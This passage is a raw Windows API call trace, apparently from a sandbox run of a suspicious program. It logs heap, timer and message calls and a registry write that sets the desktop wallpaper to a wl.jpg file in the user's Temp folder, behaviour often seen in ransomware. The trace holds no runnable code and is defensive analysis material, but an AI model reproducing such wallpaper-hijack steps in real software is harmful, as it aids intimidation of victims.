[0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0295.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0295.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0295.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0295.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0295.838] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0295.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0295.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0295.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0295.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0295.838] timeGetTime () returned 0x118a043 [0295.838] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.838] Sleep (dwMilliseconds=0xa) [0295.909] timeGetTime () returned 0x118a08a [0295.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.909] Sleep (dwMilliseconds=0xa) [0295.979] timeGetTime () returned 0x118a0d0 [0295.979] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.979] Sleep (dwMilliseconds=0xa) [0296.051] timeGetTime () returned 0x118a118 [0296.051] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.051] Sleep (dwMilliseconds=0xa) [0296.152] timeGetTime () returned 0x118a17d [0296.152] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.152] Sleep (dwMilliseconds=0xa) [0296.274] timeGetTime () returned 0x118a1f7 [0296.274] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0296.308] TranslateMessage (lpMsg=0x8cf798) returned 0 [0296.308] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0296.308] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0296.308] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0296.308] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.308] Sleep (dwMilliseconds=0xa) [0296.367] timeGetTime () returned 0x118a254 [0296.367] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.367] Sleep (dwMilliseconds=0xa) [0296.470] timeGetTime () returned 0x118a2bb [0296.470] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.470] Sleep (dwMilliseconds=0xa) [0296.506] timeGetTime () returned 0x118a2df [0296.506] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.506] Sleep (dwMilliseconds=0xa) [0296.543] timeGetTime () returned 0x118a304 [0296.543] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.543] Sleep (dwMilliseconds=0xa) [0296.587] timeGetTime () returned 0x118a330 [0296.587] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.587] Sleep (dwMilliseconds=0xa) [0296.631] timeGetTime () returned 0x118a35d [0296.631] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.632] Sleep (dwMilliseconds=0xa) [0296.668] timeGetTime () returned 0x118a381 [0296.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.668] Sleep (dwMilliseconds=0xa) [0296.732] timeGetTime () returned 0x118a3c1 [0296.732] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.732] Sleep (dwMilliseconds=0xa) [0296.809] timeGetTime () returned 0x118a40e [0296.809] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.809] Sleep (dwMilliseconds=0xa) [0296.849] timeGetTime () returned 0x118a436 [0296.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0296.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0296.849] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0296.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0296.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0296.850] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0296.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0296.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0296.851] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0296.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0296.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.851] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0296.852] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0296.852] RegCloseKey (hKey=0x2d0) returned 0x0 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0296.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0296.853] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0296.853] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0296.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0296.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0296.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0296.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0296.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0296.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0296.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0296.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0296.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0296.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0296.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0296.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0296.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 